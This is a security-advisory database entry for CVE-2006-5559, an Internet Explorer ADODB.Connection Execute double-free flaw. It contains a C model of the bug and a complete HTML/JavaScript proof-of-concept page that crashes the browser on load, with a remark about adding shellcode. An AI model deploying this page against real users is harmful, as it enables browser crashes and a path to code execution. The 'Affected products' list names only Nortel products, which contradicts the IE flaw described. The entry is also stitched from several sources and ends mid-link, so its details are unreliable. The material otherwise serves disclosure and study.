Microsoft IE ADODB.Connection Object Execute Function Memory Corruption Vulnerability

Vulnerability ID: 1111380    Type: input validation
Published: 2006-10-24    Updated: 2007-03-26
CVE: CVE-2006-5559    CNNVD ID: CNNVD-200610-479
Platform: Windows    CVSS score: 9.3
|Sources
https://www.exploit-db.com/exploits/2629
https://www.securityfocus.com/bid/20704
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-479
|Details
Internet Explorer is Microsoft's widely used web browser. The Execute() method of the ADODB.Connection ActiveX object in IE has a memory corruption vulnerability: a remote attacker who lures a user into opening a malicious web page or HTML document can crash the browser or execute arbitrary code. Execute() lets a malicious script free heap memory in a way that bypasses the script interpreter's memory manager. The second argument of Execute is a VARIANT that is passed to VariantClear; if that variant holds a BSTR, VariantClear releases the string memory with SysFreeString. The script interpreter has no way of knowing that the string memory has been freed, so after the Execute call returns it may free the memory a second time or keep using it.
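A C model of the ownership mismatch described above, added here as an illustration (it is not from the advisory, the PoC or Microsoft's code): a callee that clears its [out] VARIANT is behaving correctly, but an interop layer that hands it the engine's live BSTR variant leaves the engine with a dangling reference, while routing the [out] parameter through a fresh temporary avoids it. The toy `pool` allocator and all function names are assumptions standing in for SysAllocString/SysFreeString/VariantClear.

```c
#include <string.h>
enum { VT_EMPTY = 0, VT_I4 = 3, VT_BSTR = 8 };
/* Toy BSTR: freeing only sets a flag, so a dangling reference can be
 * reported by the model without real undefined behaviour. */
struct bstr { char text[32]; int freed; };
struct variant { int vt; union { long l; struct bstr *s; } u; };
static struct bstr pool[4];                   /* constructed mini "heap" */
static int pool_used;
static struct bstr *sys_alloc_string(const char *src) {
    struct bstr *s = &pool[pool_used++ % 4];
    strncpy(s->text, src, sizeof s->text - 1);
    s->text[sizeof s->text - 1] = '\0';
    s->freed = 0;
    return s;
}
static void sys_free_string(struct bstr *s) { s->freed = 1; }

/* VariantClear semantics: release whatever the variant currently owns. */
static void variant_clear(struct variant *v) {
    if (v->vt == VT_BSTR && v->u.s) sys_free_string(v->u.s);
    v->vt = VT_EMPTY;
    v->u.s = NULL;
}

/* Callee with an [out] VARIANT* (like Execute's second parameter): it may
 * legitimately clear the out-variant before storing its result. */
static void execute(const char *cmd, struct variant *out) {
    variant_clear(out);
    out->vt = VT_I4;
    out->u.l = (long)strlen(cmd);
}
/* Buggy interop: the script engine passes its own live BSTR variant as the
 * [out] argument, so the callee frees a string the engine still uses.
 * Returns 1 when the engine is left holding a freed (dangling) string. */
int call_execute_unsafe(void) {
    struct variant b = { VT_BSTR, { .s = sys_alloc_string("abcdefgh") } };
    struct bstr *engine_ref = b.u.s;          /* engine keeps using this */
    execute("select 1", &b);
    return engine_ref->freed;
}

/* Hardened interop: route [out] parameters through a fresh VT_EMPTY temporary
 * so caller-owned data is never cleared.  Returns 1 when the engine's string
 * survives and the result arrived in the temporary. */
int call_execute_safe(void) {
    struct variant b = { VT_BSTR, { .s = sys_alloc_string("abcdefgh") } };
    struct variant tmp = { VT_EMPTY, { .l = 0 } };
    execute("select 1", &tmp);
    return !b.u.s->freed && tmp.vt == VT_I4 && tmp.u.l == 8;
}
```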
|Exploit (PoC)
<!--
// Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC
// tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed
// Author: YAG KOHHA (skyhole [at] gmail.com)
// Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic

// Access violation at:
// ----------------------------------------------------
// 77114D0F   66:8B75 00       MOV SI,WORD PTR SS:[EBP]
// ----------------------------------------------------
// P.S. It'll be fast with some shellcode :P
-->

<html>
<head>
<title>ADODB.Connection.Execute CRASH TEST</title>
</head>
<script>
function Bang_Bang() {
    var a = new ActiveXObject('ADODB.Connection.2.7');
    var b = 'FUCK';
    while (b.length <= 1024*256) b += b;   // double the string until it exceeds 256 KB
    for (var i = 0; i < 32768; i++)
        try { a.Execute(b, b, b); } catch (e) {}   // the second argument is the variant handed to VariantClear
}
</script>
<body onLoad='Bang_Bang()'>
<center><h1>WOW!!! Are U live?</h1></center>
</body></html>

# milw0rm.com [2006-10-24]
|Affected products
Nortel Networks Symposium TAPI Service Provider
Nortel Networks Symposium Network Control Center (NCC)
Nortel Networks Symposium Agent
Nortel Networks Contact Center Manager Server 0
|References

VU#589272: http://www.kb.cert.org/vuls/id/589272
TA07-044A: http://www.us-cert.gov/cas/techalerts/TA07-044A.html
XF ie-adodbconnection-Code-Execution(29837): http://xforce.iss.net/xforce/xfdb/29837
BID 20704: http://www.securityfocus.com/bid/20704
SECTRACK 1017127: http://securitytracker.com/id?1017127
MISC: http://research.eeye.com/html/alerts/zeroday/20061027.html
OSVDB 31882: http://www.osvdb.org/31882
MILW0RM 2629: http://www.milw0rm.com/exploits/2629
MS MS07-009: http://www.microsoft.com/technet/security/Bulletin/MS07-009.mspx
VUPEN ADV-2007-0578: http://www.frsirt.com/english/advisories/2007/0578
SECUNIA 22452: http://secunia.com/advisories/22452
MILW0RM 2629: http://milw0rm.com/exploits/2629
MISC: http://blogs.technet.com/msrc/archive/2006/10/27/adodb-connection-poc-published.aspx
OVAL oval:org.mitre.oval:def:214: http://oval.mitre